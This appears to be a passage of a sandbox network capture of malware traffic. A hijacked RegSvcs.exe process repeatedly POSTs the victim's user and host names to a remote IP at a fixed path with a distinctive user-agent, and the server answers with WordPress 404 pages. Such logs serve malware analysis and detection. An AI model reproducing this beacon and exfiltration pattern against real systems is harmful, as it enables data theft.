                                            May 29, 2024 15:45:23.219221115 CEST1236INData Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                                            Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
                                            May 29, 2024 15:45:23.219244003 CEST1236INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69
                                            Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            74192.168.2.94978945.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:23.375855923 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:23.380857944 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:25.972965956 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:23 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:25.973031998 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:25.973088026 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:25.973102093 CEST672INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:25.973134995 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:45:25.973170042 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:45:25.973298073 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:25.973350048 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:45:25.973378897 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:45:25.973412037 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            75192.168.2.94979045.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:26.168824911 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:26.173861027 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:28.730727911 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:26 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:28.730783939 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:28.730834961 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:28.730866909 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:28.730906963 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:28.730940104 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:28.730977058 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:45:28.731048107 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:45:28.731089115 CEST1236INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink)
                                            May 29, 2024 15:45:28.731123924 CEST1236INData Raw: 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70
                                            Data Ascii: --white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            76192.168.2.94979145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:28.962608099 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:28.968564034 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:31.591363907 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:29 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:31.591384888 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:45:31.591393948 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:31.591415882 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:45:31.591425896 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:45:31.591510057 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
